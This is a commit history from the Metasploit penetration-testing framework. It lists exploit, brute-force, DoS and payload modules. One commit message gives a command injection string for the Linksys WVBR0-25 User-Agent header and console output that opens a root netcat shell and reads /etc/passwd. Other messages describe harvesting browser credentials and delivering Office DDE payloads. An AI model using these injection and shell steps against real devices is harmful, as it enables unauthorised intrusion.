b0yd
ec7625af9f
Damn spaces...
2017-12-22 10:57:11 -05:00
b0yd
2b33b88fa4
Damn spaces
2017-12-22 10:54:31 -05:00
b0yd
e088c95a99
Module Cleanup
2017-12-22 10:51:01 -05:00
Jon Hart
b29948412e
Correct permissions, fixing warning
2017-12-22 07:27:11 -08:00
b0yd
d657a9dc53
Commvault Remote Command Injection
2017-12-22 10:04:13 -05:00
headlesszeke
3dfb836768
Ranking upgrade and uses agent key instead of manually setting user-agent in headers
2017-12-21 23:10:26 -06:00
headlesszeke
b31ac73996
Ensure vulnerability check cannot false positive with the power of runtime randomness
2017-12-21 22:53:46 -06:00
William Vu
caae33b417
Land #9170 , Linux UDF for mysql_udf_payload
2017-12-21 20:48:24 -06:00
headlesszeke
8c3836cc88
Removed msf/core require statement and extraneous debug message
2017-12-21 19:55:56 -06:00
juushya
a86abb0297
Implemented get_cookies_parsed
2017-12-22 05:36:36 +05:30
headlesszeke
2ee42e1433
Adds exploit module for CVE-2017-17411
...
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
Example console output:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
HeadlessZeke
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload information:
Space: 1024
Description:
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to
connect wireless Genie cable boxes to the Genie DVR, is vulnerable
to OS command injection in version < 1.0.41 of the web management
portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
References:
http://cvedetails.com/cve/2017-17411/
http://www.zerodayinitiative.com/advisories/ZDI-17-973
https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N] y
[*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output: root❌ 0:0::/:/bin/sh nobody❌ 99:99:Nobody:/:/bin/nologin sshd❌ 22:22::/var/empty:/sbin/nologin admin❌ 1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga❌ 1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Tod Beardsley
5dfb5d581a
Switch get_cookies to get_cookies_parsed
...
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart
962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login
2017-12-20 18:58:36 -08:00
Jon Hart
298cb16b1a
Set default USER/PASS files
2017-12-20 18:44:43 -08:00
Jon Hart
b9af835d06
Style
2017-12-20 18:05:00 -08:00
Jon Hart
d0b3abc14b
Better handling of MQTT endpoints which don't require authentication
...
Arguably this is working around LoginScanner's inability to provide
blank usernames AND passwords
2017-12-20 18:02:52 -08:00
Brent Cook
24907938bb
bump payloads, various fixes
2017-12-20 16:47:37 -06:00
Jon Hart
495c649c7d
Better printing
2017-12-20 14:40:42 -08:00
Jon Hart
ed5f177fcd
syntax
2017-12-20 14:20:08 -08:00
Jon Hart
e66ec85677
Set default u/p
2017-12-20 14:18:33 -08:00
Brent Cook
5fe9dba4dd
Land #9296 , add iOS meterpreter support
2017-12-20 16:09:41 -06:00
Brent Cook
df4f62cde9
bump to mettle 0.3.3
2017-12-20 15:58:17 -06:00
Jeffrey Martin
8cd7185a7f
Land #9313 , Add DirectAdmin login_scanner module
2017-12-20 15:23:24 -06:00
Jeffrey Martin
7f8a5d3834
improved credential reporting
2017-12-20 15:09:11 -06:00
Nick Marcoccio
86ce3c8781
Made suggested changes and added documentation
2017-12-20 15:54:16 -05:00
Jon Hart
14c779b945
Fix rubocop warning
2017-12-20 12:44:27 -08:00
Jon Hart
c817df0bbc
Add module for bruteforcing authentication on MQTT endpoints
2017-12-20 12:30:21 -08:00
Jon Hart
7e91274796
Add module for connecting to/discovering MQTT endpoints
2017-12-20 12:29:50 -08:00
Brent Cook
a8b845fff9
Land #9283 , Add node.js ws websocket library DoS module
2017-12-20 14:20:42 -06:00
Brent Cook
210f137b7b
Merge branch 'upstream-master' into land-9296-
2017-12-20 12:07:53 -06:00
HD Moore
1619a3fcf1
Pull PPC targets for now
2017-12-20 08:33:53 -06:00
Nick Marcoccio
ce457db1e3
fixed spaces at EOL
2017-12-20 09:24:30 -05:00
Nick Marcoccio
d6024277fc
fixed missing quote
2017-12-20 09:03:32 -05:00
Nick Marcoccio
139afe45a9
Add phpCollab 2.5.1 exploit module
2017-12-20 08:36:58 -05:00
Nick Marcoccio
fe15ac3b82
Removed file committed by mistake
2017-12-20 08:27:18 -05:00
Nick Marcoccio
fd2a0d3057
Add phpCollab 2.5.1 exploit module
2017-12-20 08:22:01 -05:00
EgiX
a4098803b3
Remove OSVDB reference
2017-12-20 13:10:42 +01:00
Brent Cook
9fb445fbf0
Land #9300 , Add private data type to auxiliary scanner ftp_login and telnet_login
2017-12-20 00:30:43 -06:00
Brent Cook
6b216f2a20
Land #9290 , Fix OverrideLHOST/LPORT with http/s Meterpreter payloads
2017-12-20 00:26:06 -06:00
Tod Beardsley
216d00e39f
Use a random fname destination for /etc/passwd
2017-12-19 17:02:16 -06:00
Tod Beardsley
e93282b71d
Drop calls to vprint_*
2017-12-19 16:53:02 -06:00
Tod Beardsley
2dc2ac134e
Don't default verbose
2017-12-19 16:48:41 -06:00
Jon Hart
a2c5cc0ffb
Remove old deprecated modules
2017-12-19 07:56:16 -08:00
Jon Hart
7b386ea2c8
Fix msftidy warnings wrt Set-Cookie
2017-12-19 06:58:23 -08:00
Nick Marcoccio
acc6951bf3
fixed typo
2017-12-19 08:35:11 -05:00
Tim
358aca9435
apple_ios/aarch64/shell_reverse_tcp
2017-12-19 15:42:21 +08:00
HD Moore
25a3863784
Update WIP for GoAhead LD_PRELOAD
2017-12-18 22:20:13 -06:00
Brent Cook
9f144ce8d4
Land #9151 , mettle extension support + sniffer module
2017-12-18 21:49:40 -06:00
Tod Beardsley
f0df1750de
Land #9180
...
Land @RootUp's Samsung browser SOP module
2017-12-18 17:28:03 -06:00
Tod Beardsley
85350a9645
Add Rapid7 blog references
2017-12-18 17:11:47 -06:00
Tod Beardsley
ae4edd65e1
Hard wrap descriptions
2017-12-18 17:03:13 -06:00
Tod Beardsley
27a324237b
Initial commit for Cambium issues from @juushya
...
Note, these will trigger a bunch of WARNING msftidy messages for setting
cookies directly. This is on purpose.
2017-12-18 16:32:55 -06:00
Jon Hart
a33ed82a40
Land #9214 , @realoriginal's update to the Cisco SMI scanner to also fetch Cisco IOS configs
2017-12-18 12:22:26 -08:00
HD Moore
a44010deb1
WIP for GoAhead LD_PRELOAD
2017-12-18 10:51:47 -06:00
Brent Cook
2a94a4417a
bump payloads
2017-12-18 10:01:10 -06:00
Nick Marcoccio
6d565b6c33
added author information
2017-12-18 09:18:36 -05:00
William Vu
e9b9c80841
Fix #9307 , credit to @r0610205
2017-12-18 03:55:01 -06:00
William Vu
76823e9fe6
Land #9183 , Jenkins Groovy XStream RCE
2017-12-18 03:38:27 -06:00
William Vu
d3638d0487
Land #9154 , Tuleap PHP object injection exploit
2017-12-18 03:19:42 -06:00
William Vu
0e2a158abd
Fix global var $is_check (make ivar @is_check)
2017-12-18 03:15:33 -06:00
Nick Marcoccio
f447fa1a12
Added DirectAdmin Login Utillity
2017-12-17 22:43:37 -05:00
Pearce Barry
880a1d4283
Land #9312 , Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge
2017-12-17 18:32:28 -06:00
Pearce Barry
8344401484
Add docs, minor tweaks.
2017-12-17 18:15:49 -06:00
RootUp
917dd8e846
Update samsung_browser_sop_bypass.rb
2017-12-16 22:10:02 +05:30
RootUp
8f91377acb
Update samsung_browser_sop_bypass.rb
2017-12-16 22:09:21 +05:30
Tod Beardsley
3b3b0e6e96
And this is why I hate using single quotes
...
Also, restored the store_cred call.
This will fix up RootUp/metasploit-framework#3 for PR #9180
2017-12-14 14:28:25 -06:00
jgor
0b3a5567a4
Add module for CVE-2017-13872 iamroot remote exploit via ARD (VNC)
2017-12-14 13:59:35 -06:00
Pearce Barry
048b39ccd6
Initial commit of pdt module.
2017-12-14 09:23:21 -06:00
nromsdahl
384b250659
Add credential data type
...
Added credential data type so that successful passwords are stored in the database and accessible via the creds command.
2017-12-14 08:07:59 -06:00
nromsdahl
be4939b56a
Add credential data type
...
Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command.
2017-12-14 08:05:57 -06:00
William Vu
3cd287ddd6
Update the MS17-010 scanner to use dcerpc_getarch
2017-12-14 02:08:30 -06:00
William Vu
8e4b007edc
Move verify_arch to dcerpc_getarch
...
We can use this code elsewhere, such as the MS17-010 scanner.
2017-12-14 02:08:25 -06:00
Brent Cook
c6a2ae2551
Land #9248 , Add wd_mycloud_multiupload_upload exploit
2017-12-13 18:51:02 -06:00
Brent Cook
125a079fa9
add cve reference
2017-12-13 18:50:21 -06:00
h00die
d7ad443be1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into upstream-master
2017-12-13 19:33:05 -05:00
h00die
c0a534140d
Land #9284 a regex dos for ua_parser_js npm module
2017-12-13 19:31:49 -05:00
Wei Chen
deacebc46b
Land #9264 , Add private type when storing SSH password
...
Land #9264
2017-12-13 18:24:31 -06:00
Tod Beardsley
5226181d6d
Better conditionals from @bcoles
2017-12-13 16:48:05 -06:00
Tod Beardsley
966060d470
Nits picked by @bcoles: commas, quotes, and <head>
2017-12-13 16:38:17 -06:00
Nicholas Starke
dd5532c5de
Addressing Formatting Issues
...
There were several formatting and layout issues
that are fixed in this commit. Also changing
`RHOSTS` to `RHOST`.
2017-12-13 14:26:27 -06:00
Wei Chen
b99663fb6c
Bring #9282 up to date with upstream-master
2017-12-13 13:16:30 -06:00
Wei Chen
37514eec17
Land #9234 , Add exploit for ClickJacking vuln for pfSense
...
Land #9234
2017-12-12 14:56:21 -06:00
Wei Chen
c7019e5aee
Only load files once
2017-12-12 14:54:49 -06:00
Tod Beardsley
622050ddfc
Oops, leftover comment
2017-12-12 14:48:00 -06:00
Tod Beardsley
efa46efb48
Actually save creds, or fail through sanely
...
This incidentally also allows for a custom collector to be implemented
by the user -- for example, if they'd rather pick up a session ID or
inject a browser hook or something along those lines. It's a little
clunky, using the advanced option of CUSTOM_JS, but it seems to work
fine.
2017-12-12 14:06:18 -06:00
Wei Chen
6149f51273
Land #9256 , Add aux module to discover WSDD enabled devices
...
Land #9256
2017-12-12 11:55:42 -06:00
Tim
c4e20e01e3
iOS meterpreter
2017-12-12 23:23:21 +08:00
RootUp
5f70199218
Update samsung_browser_sop_bypass.rb
2017-12-12 15:52:55 +05:30
Brent Cook
3f6846c332
update payloads with python retry fix
2017-12-12 03:13:38 -06:00
securekomodo
b335cacfc1
Update wp_slideshowgallery_upload.rb
...
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.
[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>
After changing the incorrect variable name from "username" to "user", the exploit completes.
2017-12-12 00:33:28 -05:00
Matthew Kienow
d79b0ad981
Land #9286 , Advantech WebAccess webvrpcs BOF RCE
2017-12-12 00:25:56 -05:00
mr_me
e7a2dd2e71
fixed email
2017-12-11 23:20:46 -06:00
mr_me
26e2eb8f1a
Changed to good ranking
2017-12-11 23:14:36 -06:00
Pearce Barry
9a6c54840b
Minor tweak to use vprint...
2017-12-11 16:48:47 -06:00
Nicholas Starke
2d23054a1f
Changes as per comments
...
A few things were changed as per the PR comments:
1) The module title was reworded
2) The module description was multi-lined
3) Negative logic was rewritten to use 'unless'
4) Strings which did not require interpolation were rewritten
5) Documentation markdown was added.
2017-12-11 14:11:40 -06:00
h00die
ba174f3f92
updates per @bigendiansmalls fork
2017-12-11 14:40:09 -05:00
h00die
3c916c303d
bcoles comments from #7334
2017-12-11 14:22:44 -05:00
mr_me
f8977ed72c
added some fixes
2017-12-11 11:34:17 -06:00
Ryan Knell
c5f218c84c
Addressing comments
...
1. Updated documentation
2. Made the Sec-WebSocket-Key header a random value
2017-12-11 11:49:31 -05:00
Chris Higgins
e91830efe7
Add Dup Scout Enterprise login buffer overflow
2017-12-09 02:20:05 -06:00
Tod Beardsley
cba5c7cb0f
Rename to actually call out the browser name
2017-12-08 13:53:13 -06:00
Tod Beardsley
0a9dcafb77
Actually collect the creds, sort of
...
Instead of an alert() (which the attacker won't see), this collects the
offered credentials in a POST action, and displays them in the console.
This should further store the creds somewhere handy, but this is good
enough for now for testing from @RootUp
2017-12-08 13:51:02 -06:00
Tod Beardsley
aee883a706
Fixed up description to be descriptive
2017-12-08 12:24:58 -06:00
Pearce Barry
604b949e23
Updated per review comments.
2017-12-08 10:42:43 -06:00
mr_me
34ef650b0d
fixed up msftidy, opps.
2017-12-07 17:03:39 -06:00
mr_me
75a82b3fe7
Advantech WebAccess webvrpcs ViewDll1 Stack-based Buffer Overflow Remote Code Execution Vulnerability
2017-12-07 16:34:26 -06:00
Austin
5a81f8091d
change some options for somethinf for sensible
2017-12-07 14:44:36 -05:00
Austin
335cc13cab
remove option, advanced Message seems to break it.
2017-12-07 14:17:14 -05:00
Austin
7bdc99a153
Fix HANDLER + some default options!
2017-12-07 13:53:39 -05:00
Nicholas Starke
306c5d20d9
Adding ua_parser_js ReDoS Module
...
"ua-parser-js" is an npm module for parsing browser
user-agent strings. Vulnerable version of this module
have a problematic regular expression that can be exploited
to cause the entire application processing thread to "pause"
as it tries to apply the regular expression to the input.
This is problematic for single-threaded application environments
such as nodejs. The end result is a denial of service
condition for vulnerable applications, where no further
requests can be processed.
2017-12-07 10:25:29 -06:00
Ryan Knell
c992837f0d
Adding ws DoS module
...
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
2017-12-07 10:45:57 -05:00
Austin
09aa433fdc
Add MESSAGE field for "obfuscation"
2017-12-07 08:04:31 -05:00
Austin
8bb6a8f47c
Rename office_dde_delivery to office_dde_delivery.rb
2017-12-06 22:40:37 -05:00
Austin
9d11c60d88
Office DDE Payload Delivery
...
Generate / Inject existing RTF files with DDE Payloads!
2017-12-06 21:41:00 -05:00
bwatters-r7
4ca595eb15
wvu-suggested fix
2017-12-05 11:55:17 -06:00
William Webb
adba277be0
axe errant spaces at EOL
2017-12-04 16:57:48 -08:00
William Webb
69b01d26bb
Land #9226 , Microsoft Office OLE object memory corruption
2017-12-04 16:50:27 -08:00
William Vu
19b37c7070
Land #9263 , drb_remote_codeexec fixes
...
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
Brent Cook
b13f4e25e1
thanks for making this well-known
2017-12-04 18:32:31 -06:00
Brent Cook
a27bb38d51
add authors
2017-12-04 18:25:18 -06:00
Austin
b96dac28d5
fix info segment
2017-12-04 16:42:41 -05:00
Brent Cook
f83e9815dd
Land #9210 , Add a Polycom HDX RCE
2017-12-04 12:49:35 -06:00
Brent Cook
7edab268f5
handle case-insensitive password, fix received
2017-12-04 12:47:40 -06:00
Austin
06334aa2bd
Update polycom_hdx_traceroute_exec.rb
2017-12-04 11:05:01 -05:00
Yorick Koster
942e44ceae
Added local copies of the static content
2017-12-02 10:14:14 +01:00
wetw0rk
4cbb5f2619
added new target
2017-12-01 18:35:45 -06:00
Jacob Robles
c79186593a
Update DiskBoss Module (EDB 42395)
...
Added a new target option for the
DiskBoss Server.
2017-12-01 15:08:57 -06:00
bwatters-r7
d1d8e3a678
Let's not rescue everything.....
2017-12-01 10:58:18 -06:00
Austin
c788e4e540
Update office_ms17_11882.rb
2017-12-01 11:36:03 -05:00
Austin
7df46b33e8
disassembly ASM
2017-12-01 08:03:56 -05:00
bwatters-r7
6752770695
Shut up rubocop
2017-11-30 20:45:11 -06:00
bwatters-r7
e3dc17dd92
Add some extra targets
2017-11-30 16:16:34 -06:00
bwatters-r7
3b2a0be200
First swing at osx x64 meterpreter support
2017-11-30 14:47:46 -06:00
Zenofex
1ced3994b0
Added more reference urls to wd_mycloud_multiupload_upload module.
2017-11-30 12:53:33 -06:00
nromsdahl
b24f70c7c6
Update ssh_login.rb
...
Added credential data type so password is stored in creds.
2017-11-30 11:02:06 -06:00
Brent Cook
c288dab338
fixup RHOST/RPORT expectations if only URI is set
2017-11-30 10:51:02 -06:00
Brent Cook
d689b33d7e
more error handling, deal with user error
2017-11-30 08:31:13 -06:00
Brent Cook
87e683c763
add back kill syscall for trap method
2017-11-30 08:12:15 -06:00
Brent Cook
a0e0e1db15
allow manual targeting, handle errors better
2017-11-30 07:51:12 -06:00
Brent Cook
eea72663b3
warn on method failure instead of error
2017-11-30 06:37:21 -06:00
Brent Cook
9f12b794da
cleanup comments
2017-11-30 06:37:04 -06:00
Brent Cook
5da34e8f2b
support RHOST/RPORT
2017-11-30 06:36:42 -06:00
Brent Cook
59580195b4
resurrect old methods, try all 3
2017-11-30 06:16:05 -06:00
Brent Cook
51a18b68fe
Land #9211 , handle 2016 DC's with hashdump gracefully
2017-11-29 17:26:33 -06:00
Brendan Coles
283b7c5145
Add WS-Discovery Information Discovery module
2017-11-29 12:21:22 +00:00
Tim W
58897bf2fc
msftidy
2017-11-29 16:36:50 +08:00
Tim W
7f1f7281f1
add local exploit for osx root login with no password
2017-11-29 16:06:02 +08:00
Austin
676a08b849
Update polycom_hdx_traceroute_exec.rb
2017-11-28 22:01:41 -05:00
Austin
2544b4d8db
Change target name
2017-11-28 21:39:04 -05:00
Austin
cb7f173811
Update office_ms17_11882.rb
2017-11-28 21:36:25 -05:00
Zenofex
d174ef3a70
Add wd_mycloud_multiupload_upload exploit
2017-11-28 07:12:00 -06:00
bwatters-r7
244acc48b6
Land #9212 , pfsense group member exec module
2017-11-27 11:27:29 -06:00
Brent Cook
2c6cfabbc3
Land #8948 , allow configuring payload HTTP headers for domain fronting
2017-11-25 10:08:22 -06:00
Brent Cook
8645a518b3
add mettle support for custom headers
2017-11-24 20:27:34 -06:00
vipzen
0d79a3a3e2
Add support to Windows .NET Server
2017-11-23 08:35:55 -02:00
WhiteWinterWolf
bfd5c2d330
Keep the initial option name 'ADMIN_ROLE'
2017-11-22 22:03:56 +01:00
Adam Cammack
778e69f929
Land #9229 , Randomize slowloris HTTP headers
2017-11-22 14:42:24 -06:00
attackdebris
ae43883e2b
Fix mongodb_login typo
2017-11-22 08:03:12 -05:00
Austin
960893b99d
change default payload
2017-11-22 06:36:46 -05:00
Yorick Koster
a02a02cb0c
Fixed URL...
2017-11-22 11:31:23 +01:00
Yorick Koster
d21d3c140e
Fixed date
2017-11-22 11:15:34 +01:00
Yorick Koster
916ee05cce
Add exploit module for Clickjacking vulnerability in CSRF error page pfSense
2017-11-22 11:06:22 +01:00
Austin
99555dde02
sleep! per feedback
2017-11-21 21:33:29 -05:00
Jon Hart
5484ee840e
Correct port when eating cisco config
2017-11-21 18:09:51 -08:00
Jon Hart
bdc822c67d
Improve logging when requesting config
2017-11-21 18:09:02 -08:00
Jon Hart
5a358db260
Clean up shutdown messaging
2017-11-21 17:55:17 -08:00
Jon Hart
93c424c255
Remove unused
2017-11-21 17:54:31 -08:00
Jon Hart
b0d8b0a191
Clean up incoming file handling
2017-11-21 17:54:02 -08:00
Jon Hart
879db5cf38
Land #9050 , @mpizala's improvements to the docker_daemon_tcp module
2017-11-21 17:13:24 -08:00
Austin
275f70e77e
better saving
2017-11-21 19:34:04 -05:00
Austin
db4c0fcca9
spelling
2017-11-21 19:02:14 -05:00
Matthew Kienow
785e5944d6
Enhanced slowloris HTTP headers and minor cleanup
2017-11-21 18:19:20 -05:00
Matthew Kienow
b6c81e6da0
Reimplement slowloris as external module
2017-11-21 16:21:01 -05:00
Daniel Teixeira
db2bd22d86
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
Matthew Kienow
e07fe77a69
Close sockets to resolve file handle error
2017-11-21 15:49:45 -05:00
Daniel Teixeira
52f56527d8
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
Daniel Teixeira
74becb69e8
Update slow_loris.rb
2017-11-21 15:49:45 -05:00
Daniel Teixeira
b7bc68c843
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
Daniel Teixeira
53123d92e2
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
Daniel Teixeira
21a6d0bd6e
Update slow_loris.rb
2017-11-21 15:49:44 -05:00
Daniel Teixeira
60878215e0
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
Daniel Teixeira
9457359b11
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
Daniel Teixeira
29017b8926
Update slow_loris.rb
2017-11-21 15:49:43 -05:00
Daniel Teixeira
f79b41edde
Slow Loris
2017-11-21 15:48:11 -05:00
Brent Cook
a7932ffe0e
fix sizes
2017-11-21 14:31:14 -06:00
Austin
fcea6fd8d4
actually create new file ;-;
2017-11-21 15:00:06 -05:00
Brent Cook
4050985649
update payloads
2017-11-21 13:53:33 -06:00
Brent Cook
1fd7f7c8bc
prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
...
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
Austin
39a4d193a1
Create office_ms17_11882.rb
2017-11-21 14:47:02 -05:00
Robin Verton
52356e00b7
Use stylistic suggestions from rubocop
2017-11-21 14:30:13 +01:00
h00die
dd8238d146
rubocop got a donut
2017-11-20 20:08:28 -05:00
Adam Cammack
dd57138423
Make external module read loop more robust
...
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
Austin
cfd06ab24a
what was i thinking?
2017-11-20 16:08:48 -05:00
Austin
b6e2e2aa45
adjust delay
2017-11-19 09:43:18 -05:00
h00die
579d012fa2
spelling
2017-11-19 08:36:27 -05:00
h00die
b7f7afb3be
version detect, 2.2.6 handling
2017-11-19 08:28:07 -05:00
Austin
1087b8ca16
cleanup
2017-11-18 20:09:29 -05:00
Austin
35567e3e23
Fix - copy system:running-config tftp://ip/file
...
Copies running config directly to TFTP server, thus removing the need to delete the file :D.
2017-11-18 13:02:12 -05:00
Austin
f84f824a71
remove ?
2017-11-17 16:15:18 -05:00
Austin
b457c60542
WORK IN PROGRESS - "GET"
...
Work in progress of GET, and PUT. PUT works fine for grabbing the configuration. GET will be used for service a config to execute commands , or the also WIP action "UPLOAD"
2017-11-17 15:36:27 -05:00